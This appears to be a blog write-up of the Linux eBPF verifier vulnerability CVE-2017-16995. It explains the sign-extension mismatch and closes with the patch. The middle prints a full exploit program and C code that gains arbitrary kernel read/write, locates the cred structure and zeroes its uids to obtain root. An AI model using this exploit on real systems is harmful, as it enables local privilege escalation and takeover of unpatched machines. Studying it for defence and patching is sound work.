    /* check src operand */
    [1] err = check_reg_arg(regs, insn->src_reg, SRC_OP);
    if (err)
    return err;

    [1] err = check_reg_arg(regs, insn->dst_reg, DST_OP_NO_MARK);
    if (err)
    return err;

    src_reg_type = regs[insn->src_reg].type;

    /* check that memory (src_reg + off) is readable,
    * the state of dst_reg will be updated by this func
    */
    [2] err = check_mem_access(env, insn->src_reg, insn->off,
    BPF_SIZE(insn->code), BPF_READ,
    insn->dst_reg);
    if (err)
    return err;

    if (BPF_SIZE(insn->code) != BPF_W) {
    insn_idx++;
    continue;
    }

    if (insn->imm == 0) {
    /* saw a valid insn
    * dst_reg = *(u32 *)(src_reg + off)
    * use reserved 'imm' field to mark this insn
    */
    insn->imm = src_reg_type;

    } else if (src_reg_type != insn->imm &&
    (src_reg_type == PTR_TO_CTX ||
    insn->imm == PTR_TO_CTX)) {
    /* ABuser program is trying to use the same insn
    * dst_reg = *(u32*) (src_reg + off)
    * with different pointer types:
    * src_reg == ctx in one branch and
    * src_reg == stack|map in some other branch.
    * Reject it.
    */
    verbose("same insn cannot be used with different pointers\n");
    return -EINVAL;
    }

    } else if (class == BPF_STX) {
    enum bpf_reg_type dst_reg_type;

    if (BPF_MODE(insn->code) == BPF_XADD) {
    err = check_xadd(env, insn);
    if (err)
    return err;
    insn_idx++;
    continue;
    }

    /* check src1 operand */
    [1] err = check_reg_arg(regs, insn->src_reg, SRC_OP);
    if (err)
    return err;
    /* check src2 operand */
    [1] err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
    if (err)
    return err;

    dst_reg_type = regs[insn->dst_reg].type;

    /* check that memory (dst_reg + off) is writeable */
    [2] err = check_mem_access(env, insn->dst_reg, insn->off,
    BPF_SIZE(insn->code), BPF_WRITE,
    insn->src_reg);
    if (err)
    return err;

    if (insn->imm == 0) {
    insn->imm = dst_reg_type;
    } else if (dst_reg_type != insn->imm &&
    (dst_reg_type == PTR_TO_CTX ||
    insn->imm == PTR_TO_CTX)) {
    verbose("same insn cannot be used with different pointers\n");
    return -EINVAL;
    }

    }
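    Given these checks, if we load an address with an assignment such as MOV and then read or write through it, the register type is CONST_IMM and the access is rejected. Another idea is to take the return value of a helper call such as BPF_FUNC_map_lookup_elem, assign it to some register, and read or write through that. In that case the register is marked UNKNOWN_VALUE at assignment, and the access is rejected as well.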
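
The effect of this type check can be summarized as a small predicate. This is a simplified sketch based only on the description above, not the kernel's check_mem_access, which also validates offsets and sizes. The enum is copied from the listing earlier in this article, and the function name base_reg_may_access_memory is hypothetical.

```c
#include <stdbool.h>

/* Register types tracked by the verifier (copied from the listing above). */
enum bpf_reg_type {
    NOT_INIT = 0,             /* nothing was written into register */
    UNKNOWN_VALUE,            /* reg doesn't contain a valid pointer */
    PTR_TO_CTX,               /* reg points to bpf_context */
    CONST_PTR_TO_MAP,         /* reg points to struct bpf_map */
    PTR_TO_MAP_VALUE,         /* reg points to map element value */
    PTR_TO_MAP_VALUE_OR_NULL, /* points to map elem value or NULL */
    FRAME_PTR,                /* reg == frame_pointer */
    PTR_TO_STACK,             /* reg == frame_pointer + imm */
    CONST_IMM,                /* constant integer value */
};

/*
 * Hypothetical, simplified model: a load or store is only considered
 * when the base register is a map value, context, or stack pointer.
 */
static bool base_reg_may_access_memory(enum bpf_reg_type type)
{
    switch (type) {
    case PTR_TO_MAP_VALUE:
    case PTR_TO_CTX:
    case FRAME_PTR:
    case PTR_TO_STACK:
        return true;
    default:
        /* CONST_IMM, UNKNOWN_VALUE, NOT_INIT, ...: rejected */
        return false;
    }
}
```

Under this model, both attack ideas fail for the same reason: a register filled by MOV is CONST_IMM and one marked UNKNOWN_VALUE is not a pointer type either, so neither can serve as the base of a memory access.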

    bpf_prog_run

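    That covers all the load-time checks; every memory read/write approach we could think of is detected. Actual execution happens in __bpf_prog_run, where the registers and the stack turn out to be nothing more than local variables of the function.
    The function keeps a jump table indexed by opcode and performs no checks at all. The implementation is simple enough that we will not go through it. Note that the registers here differ from those in the verifier: at run time they are unsigned long long (u64).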
    static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)
    {
    u64 stack[MAX_BPF_STACK / sizeof(u64)];
    u64 regs[MAX_BPF_REG], tmp;
    static const void *jumptable[256] = {
    [0 ... 255] = &&default_label,
    /* Now overwrite non-defaults ... */
    ...

    Vulnerability Analysis

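    The vulnerability exists because the verifier and the real executor do not evaluate instructions the same way; the main problem is that they use different types for register values. Consider the following eBPF instructions: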
    [0]: ALU_MOV_K(0,9,0x0,0xffffffff)	/* r9 = (u32)0xFFFFFFFF */
    [1]: JMP_JNE_K(0,9,0x2,0xffffffff) /* if (r9 == -1) { */
    [2]: ALU64_MOV_K(0,0,0x0,0x0)
    [3]: JMP_EXIT(0,0,0x0,0x0) /* exit(0); */
    [4]: ......
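    Instruction [0] puts 0xffffffff into r9. In do_check this is handled at [1] in check_alu_op below, which copies 0xffffffff straight into r9's tracked state and sets the type to CONST_IMM. Instruction [1] compares r9 with 0xffffffff: if they are equal, [2] and [3] execute, otherwise execution jumps to [4]. As the earlier analysis of the exit path shows, do_check sees this comparison as always equal, so it does not push the other path onto the stack and exits at [3] without ever checking [4] onward.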
    if (class == BPF_ALU || class == BPF_ALU64) {
    err = check_alu_op(env, insn);
    if (err)
    return err;
    }
    static int check_alu_op(struct verifier_env *env, struct bpf_insn *insn)
    {
    struct reg_state *regs = env->cur_state.regs;
    u8 opcode = BPF_OP(insn->code);
    int err;

    if (opcode == BPF_END || opcode == BPF_NEG) {
    ... ...
    }

    /* check src operand */
    .......

    /* check dest operand */
    .......

    } else if (opcode == BPF_MOV) {

    if (BPF_SRC(insn->code) == BPF_X) {
    if (insn->imm != 0 || insn->off != 0) {
    verbose("BPF_MOV uses reserved fields\n");
    return -EINVAL;
    }

    /* check src operand */
    err = check_reg_arg(regs, insn->src_reg, SRC_OP);
    if (err)
    return err;
    } else {
    if (insn->src_reg != BPF_REG_0 || insn->off != 0) {
    verbose("BPF_MOV uses reserved fields\n");
    return -EINVAL;
    }
    }

    /* check dest operand */
    err = check_reg_arg(regs, insn->dst_reg, DST_OP);
    if (err)
    return err;

    if (BPF_SRC(insn->code) == BPF_X) {
    if (BPF_CLASS(insn->code) == BPF_ALU64) {
    /* case: R1 = R2
    * copy register state to dest reg
    */
    regs[insn->dst_reg] = regs[insn->src_reg];
    } else {
    if (is_pointer_value(env, insn->src_reg)) {
    verbose("R%d partial copy of pointer\n",
    insn->src_reg);
    return -EACCES;
    }
    regs[insn->dst_reg].type = UNKNOWN_VALUE;
    regs[insn->dst_reg].map_ptr = NULL;
    }
    [1] } else {
    /* case: R = imm
    * remember the value we stored into this reg
    */
    regs[insn->dst_reg].type = CONST_IMM;
    regs[insn->dst_reg].imm = insn->imm;
    }

    } else if (opcode > BPF_END) {
    verbose("invalid BPF_ALU opcode %x\n", opcode);
    return -EINVAL;

    } else { /* all other ALU ops: and, sub, xor, add, ... */
    ......
    }

    return 0;
    }
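    At run time, however, the two operands are not handled with the same width, so the second instruction (the jump at [1]) behaves differently: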
    JMP_JNE_K:
    if (DST != IMM) {
    insn += insn->off;
    CONT_JMP;
    }
    CONT;
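    In the compiled interpreter the immediate is loaded with movsxd, which sign-extends it from 0xffffffff to 0xffffffffffffffff. r9, by contrast, holds 0x00000000ffffffff, because the 32-bit move in [0] zero-extends its result. The two values differ when compared, so execution jumps to [4], and everything from [4] onward runs without ever having been checked by the verifier.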
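The disagreement between the two views can be reproduced in a few lines of plain C. This is only a sketch: `verifier_thinks_equal` and `runtime_sees_equal` are hypothetical names that model the pre-patch verifier bookkeeping and the interpreter's comparison, not kernel functions.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical model of the pre-patch verifier: it remembers the raw signed
 * 32-bit immediate of the mov and later compares it with the immediate of
 * the conditional jump. */
static bool verifier_thinks_equal(int32_t mov_imm, int32_t jmp_imm)
{
    int64_t tracked = mov_imm;            /* regs[dst].imm = insn->imm */
    return tracked == (int64_t)jmp_imm;   /* both sides sign-extended */
}

/* Hypothetical model of the interpreter: a 32-bit ALU mov zero-extends into
 * the 64-bit register, while the jump sign-extends its immediate. */
static bool runtime_sees_equal(int32_t mov_imm, int32_t jmp_imm)
{
    uint64_t dst = (uint32_t)mov_imm;            /* DST = (u32) IMM */
    uint64_t imm = (uint64_t)(int64_t)jmp_imm;   /* movsxd-style extension */

    assert((dst >> 32) == 0);   /* upper half is always clear after a 32-bit mov */
    return dst == imm;
}
```

With both immediates set to -1 (0xffffffff), the first function reports equality and the second does not, which is exactly the gap the exploit relies on. For non-negative immediates the two models agree.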

Exploitation

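Because the instructions from [4] onward are never checked, we are free to craft them however we like. Since no type information is enforced at run time, this yields arbitrary kernel memory read and write. Compiling and running the exp from exploit-db is enough to get root.
The rest of this section analyzes how the exp escalates privileges. The logic of its eBPF program is as follows: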

[0]: ALU_MOV_K(BPF_REG_9, BPF_REG_0, 0x0, 0xffffffff)	//r9 = -1
[1]: JMP_JNE_K(BPF_REG_9, BPF_REG_0, 0x2, 0xffffffff) //if(r9 == -1){
[2]: ALU64_MOV_K(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //r0 = 0
[3]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit(0)
[4]: LD_MAP_FD(BPF_REG_9, map_addr) //r9 = mapfd
[5]: bpf_map_padding
----------------------------------------------------------------------------
[6]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0) //r1 = r9
[7]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0) //r2 = r10(rbp)
[8]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc) //r2 = r2-4
[9]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x0) //[rbp-4] = 0
[10]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0,
BPF_FUNC_map_lookup_elem) //call BPF_FUNC_map_lookup_elem
[11]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0) //if(r0 == 0){
[12]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit
[13]: LDX_MEM_DW(BPF_REG_6, BPF_REG_0, 0x0, 0x0) //r6 = [r0] = map[0]
----------------------------------------------------------------------------
[14]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0) //r1 = r9
[15]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0) //r2 = r10
[16]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc)//r2 = r2 - 4
[17]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x1) //[rbp-4] = 1
[18]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0,
BPF_FUNC_map_lookup_elem)
[19]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0) //if(r0 == 0){
[20]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit(0)
[21]: LDX_MEM_DW(BPF_REG_7, BPF_REG_0, 0x0, 0x0) //r7 = [r0] = map[1]
----------------------------------------------------------------------------
[22]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0)
[23]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0)
[24]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc)
[25]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x2)
[26]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0,
BPF_FUNC_map_lookup_elem)
[27]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0)
[28]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[29]: LDX_MEM_DW(BPF_REG_8, BPF_REG_0, 0x0, 0x0) //r8 = [r0] = map[2]
----------------------------------------------------------------------------
[30]: ALU64_MOV_X(BPF_REG_2, BPF_REG_0, 0x0, 0x0)//r2=r0
[31]: ALU64_MOV_K(BPF_REG_0, BPF_REG_0, 0x0, 0x0)//r0=0
[32]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x3, 0x0)// if r6 != 0 jmp 36
[33]: LDX_MEM_DW(BPF_REG_3, BPF_REG_7, 0x0, 0x0)//r3=[r7]
[34]: STX_MEM_DW(BPF_REG_2, BPF_REG_3, 0x0, 0x0)//[r2]=r3
[35]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)//exit
[36]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x2, 0x1)//if r6 != 1 jmp 39
[37]: STX_MEM_DW(BPF_REG_2, BPF_REG_10, 0x0, 0x0)//[r2]=r10=rbp
[38]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)//exit
[39]: STX_MEM_DW(BPF_REG_7, BPF_REG_8, 0x0, 0x0)//[r7]=r8
[40]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)//exit

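Let us go through the program.
Instructions [0]~[3] were analyzed above, so we continue with the rest.
Instructions [4]~[5] follow from the map background covered earlier: [5] is padding (the second slot of the two-slot LD_MAP_FD instruction), and once they have executed, r9 holds the address of the map.
Instructions [6]~[13] correspond to the C-like code below: they call BPF_FUNC_map_lookup_elem(map_addr, idx) and load the value it points to into r6, i.e. r6 = map[0].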

[6]: r1 = r9
[7]: r2 = rbp
[8]: r2 = r2-4
[9]: [rbp+(-4)] = 0 (idx)
[10]: call BPF_FUNC_map_lookup_elem
[11]: if r0 == 0:
[12]: exit(0)
[13]: r6 = [r0]

[14]~[21] do the same to set r7 = map[1], and [22]~[29] set r8 = map[2]. The contents of the map can be supplied from user space.
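The lookup sequence can also be modeled in ordinary C. The sketch below assumes a three-slot array map with 8-byte values, as the exp creates; `struct array_map`, `map_lookup_elem` and `load_slot` are hypothetical stand-ins for illustration, not the kernel helper itself.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MAP_ENTRIES 3   /* the exp creates an array map with 3 slots */

/* Hypothetical stand-in for a BPF_MAP_TYPE_ARRAY with 8-byte values. */
struct array_map {
    uint64_t values[MAP_ENTRIES];
};

/* Models BPF_FUNC_map_lookup_elem(map, &key): returns a pointer to the
 * value, or NULL when the index is out of range. */
static uint64_t *map_lookup_elem(struct array_map *map, const uint32_t *key)
{
    assert(map != NULL && key != NULL);
    if (*key >= MAP_ENTRIES)
        return NULL;
    return &map->values[*key];
}

/* Models one lookup sequence such as [6]~[13]: store the index in a stack
 * slot, call the helper, bail out on NULL, otherwise load the 64-bit value.
 * Returns 0 on success and -1 when the lookup fails. */
static int load_slot(struct array_map *map, uint32_t idx, uint64_t *out)
{
    uint32_t key = idx;                            /* [rbp-4] = idx; r2 = rbp-4 */
    uint64_t *value = map_lookup_elem(map, &key);  /* r0 = lookup(r1, r2) */

    if (value == NULL)                             /* if (r0 == 0) exit */
        return -1;
    *out = *value;                                 /* r6 = [r0] */
    return 0;
}
```

Calling `load_slot` with indices 0, 1 and 2 mirrors the three repeated sequences that fill r6, r7 and r8.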
Finally, [30]~[40] split into three cases:

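  1. map[0] is 0: r3 is loaded from the address stored in map[1], then map[2] = r3. Since the value of map[1] is under our control, this sequence gives an arbitrary address read.

  2. map[0] is 1: rbp is stored into map[2], leaking a kernel stack address (the frame pointer).

  3. map[0] is 2: the value of map[2] is written to the address stored in map[1], which gives an arbitrary address write.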

    // r6 == map[0]		r7 == map[1]	r8 == map[2]
    [30]: ALU64_MOV_X(BPF_REG_2, BPF_REG_0, 0x0, 0x0) //r2 = r0 = &map[2]
    [31]: ALU64_MOV_K(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //r0 = 0
    [32]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x3, 0x0) //if(r6 != 0) jmp 36
    [33]: LDX_MEM_DW(BPF_REG_3, BPF_REG_7, 0x0, 0x0) //r3 = [r7]
    [34]: STX_MEM_DW(BPF_REG_2, BPF_REG_3, 0x0, 0x0) //[r2] = r3
    [35]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit
    [36]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x2, 0x1) //if(r6 != 1) jmp 39
    [37]: STX_MEM_DW(BPF_REG_2, BPF_REG_10, 0x0, 0x0) //[r2] = r10 = rbp
    [38]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit
    [39]: STX_MEM_DW(BPF_REG_7, BPF_REG_8, 0x0, 0x0) //[r7] = r8
    [40]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit
  4. Create the map, load the eBPF program, and attach it to a socket.

    void  initialize() {
    ...
    mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0);
    if (mapfd < 0) {
    fail("failed to create bpf map: '%s'\n", strerror(errno));
    }

    redact("sneaking evil bpf past the verifier\n");
    progfd = load_prog();
    if (progfd < 0) {
    if (errno == EACCES) {
    msg("log:\n%s", bpf_log_buf);
    }
    fail("failed to load prog '%s'\n", strerror(errno));
    }

    redact("creating socketpair()\n");
    if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) {
    fail("failed to create socket pair '%s'\n", strerror(errno));
    }

    redact("attaching bpf backdoor to socket\n");
    if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) {
    fail("setsockopt '%s'\n", strerror(errno));
    }
    }
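  5. Locate the cred structure. This exp does not go through the task_struct reached via thread_info; instead it leaks the socket address and finds cred through a field of another structure (struct sock). The classic version leaks a kernel stack address addr and computes addr & ~(0x4000-1) to find thread_info and, from there, cred. That works because thread_info sits at the base of the 16 KiB kernel stack, so one address determines the other.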

    static unsigned long find_cred() {
    uid_t uid = getuid();
    unsigned long skbuff = get_skbuff();
    /*
    * struct sk_buff {
    * [...24 byte offset...]
    * struct sock *sk;
    * };
    *
    */

    unsigned long sock_addr = read64(skbuff + 24);
    msg("skbuff => %llx\n", skbuff);
    msg("Leaking sock struct from %llx\n", sock_addr);
    if(sock_addr < PHYS_OFFSET){
    fail("Failed to find Sock address from sk_buff.\n");
    }

    /*
    * scan forward for expected sk_rcvtimeo value.
    *
    * struct sock {
    * [...]
    * const struct cred *sk_peer_cred;
    * long sk_rcvtimeo;
    * };
    */
    for (int i = 0; i < 100; i++, sock_addr += 8) {
    if(read64(sock_addr) == 0x7FFFFFFFFFFFFFFF) {
    unsigned long cred_struct = read64(sock_addr - 8);
    if(cred_struct < PHYS_OFFSET) {
    continue;
    }

    unsigned long test_uid = (read64(cred_struct + 8) & 0xFFFFFFFF);

    if(test_uid != uid) {
    continue;
    }
    msg("Sock->sk_rcvtimeo at offset %d\n", i * 8);
    msg("Cred structure at %llx\n", cred_struct);
    msg("UID from cred structure: %d, matches the current: %d\n", test_uid, uid);

    return cred_struct;
    }
    }
    fail("failed to find sk_rcvtimeo.\n");
    }
  6. Use the arbitrary write to set the uid fields in cred to 0, then spawn a root shell.

    static void hammer_cred(unsigned long addr) {
    msg("hammering cred structure at %llx\n", addr);
    #define w64(w) { write64(addr, (w)); addr += 8; }
    unsigned long val = read64(addr) & 0xFFFFFFFFUL;
    w64(val);
    w64(0); w64(0); w64(0); w64(0);
    w64(0xFFFFFFFFFFFFFFFF);
    w64(0xFFFFFFFFFFFFFFFF);
    w64(0xFFFFFFFFFFFFFFFF);
    #undef w64
    }
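To make the three backdoor modes concrete, here is a user-space model of instructions [30]~[40], together with read and write wrappers in the spirit of the read64/write64 helpers used by find_cred and hammer_cred. It is a sketch under stated assumptions: `struct backdoor_map`, `run_backdoor`, `model_read64` and `model_write64` are hypothetical names, the "kernel memory" is just ordinary process memory, and the real exp triggers the program by sending data through the attached socket rather than by a direct call.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical view of the 3-slot map: slot[0] = op, slot[1] = address,
 * slot[2] = value. */
struct backdoor_map {
    uint64_t slot[3];
};

/* Models instructions [30]~[40]; frame_ptr stands in for r10 (rbp). */
static void run_backdoor(struct backdoor_map *map, uint64_t frame_ptr)
{
    assert(map != NULL);

    uint64_t op = map->slot[0];      /* r6 */
    uint64_t addr = map->slot[1];    /* r7 */
    uint64_t value = map->slot[2];   /* r8 */

    if (op == 0)
        map->slot[2] = *(const uint64_t *)(uintptr_t)addr;  /* arbitrary read */
    else if (op == 1)
        map->slot[2] = frame_ptr;                           /* leak frame pointer */
    else
        *(uint64_t *)(uintptr_t)addr = value;               /* arbitrary write */
}

/* Read 8 bytes from addr through the modeled backdoor (op 0). */
static uint64_t model_read64(struct backdoor_map *map, uint64_t addr)
{
    map->slot[0] = 0;
    map->slot[1] = addr;
    map->slot[2] = 0;
    run_backdoor(map, 0);
    return map->slot[2];
}

/* Write 8 bytes to addr through the modeled backdoor (op 2). */
static void model_write64(struct backdoor_map *map, uint64_t addr, uint64_t value)
{
    map->slot[0] = 2;
    map->slot[1] = addr;
    map->slot[2] = value;
    run_backdoor(map, 0);
}
```

In this model, reading or writing a local variable through `model_read64` and `model_write64` behaves like the exp's primitives do against kernel addresses: the caller only ever touches the three map slots, and the dispatcher performs the actual memory access.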

This concludes the analysis of the vulnerability.

Patch

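The fix, from the mainline kernel tree (kernel/git/torvalds/linux.git), is shown below.
It adds a check for BPF_ALU64 in check_alu_op (called from do_check), so that 64-bit and 32-bit immediate moves are tracked separately. The value the verifier records now matches what the interpreter actually computes at run time, and the vulnerability can no longer be exploited.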

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 625e358ca765e..c086010ae51ed 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -2408,7 +2408,13 @@ static int check_alu_op(struct bpf_verifier_env *env, struct bpf_insn *insn)
* remember the value we stored into this reg
*/
regs[insn->dst_reg].type = SCALAR_VALUE;
- __mark_reg_known(regs + insn->dst_reg, insn->imm);
+ if (BPF_CLASS(insn->code) == BPF_ALU64) {
+ __mark_reg_known(regs + insn->dst_reg,
+ insn->imm);
+ } else {
+ __mark_reg_known(regs + insn->dst_reg,
+ (u32)insn->imm);
+ }
}

} else if (opcode > BPF_END) {
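The effect of the patch on the earlier JNE check can be sketched in C as well. `tracked_after_mov_imm` and `patched_verifier_takes_jne` are hypothetical names that model the patched bookkeeping only; they are not the kernel's own functions.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical model of the patched "R = imm" bookkeeping: the known value
 * is sign-extended for BPF_ALU64 and truncated to 32 bits otherwise. */
static uint64_t tracked_after_mov_imm(bool is_alu64, int32_t imm)
{
    if (is_alu64)
        return (uint64_t)(int64_t)imm;   /* __mark_reg_known(reg, insn->imm) */

    uint64_t tracked = (uint32_t)imm;    /* __mark_reg_known(reg, (u32)insn->imm) */
    assert((tracked >> 32) == 0);        /* matches a zero-extending 32-bit mov */
    return tracked;
}

/* Would the patched verifier consider "if (reg != jmp_imm) goto ..." taken?
 * The jump's immediate is sign-extended, as at run time. */
static bool patched_verifier_takes_jne(bool is_alu64, int32_t mov_imm, int32_t jmp_imm)
{
    uint64_t tracked = tracked_after_mov_imm(is_alu64, mov_imm);
    return tracked != (uint64_t)(int64_t)jmp_imm;
}
```

For a 32-bit mov of -1 followed by a JNE against -1, this model now reports the branch as taken, so the path starting at [4] is no longer skipped during verification. For a 64-bit mov the values still compare equal, as they do at run time.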

References

http://p4nda.top/2019/01/18/CVE-2017-16995

https://v1ckydxp.github.io/2019/09/02/2019-09-02-cve-2017-16995%20%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

https://xz.aliyun.com/t/7782

https://xz.aliyun.com/t/2212


Unless otherwise stated, all articles on this blog are licensed under CC BY-SA 4.0. Please credit the source when reposting!